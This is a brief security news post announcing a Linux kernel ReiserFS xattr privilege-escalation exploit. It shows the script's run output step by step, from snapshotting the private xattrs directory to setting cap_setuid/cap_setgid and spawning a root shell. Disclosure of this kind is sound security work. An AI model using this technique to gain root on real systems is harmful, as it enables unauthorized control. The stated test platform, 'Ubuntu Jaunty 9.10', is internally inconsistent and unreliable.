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[ NEWS ] : Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation

Author: Jon Oberheide

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...


Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.



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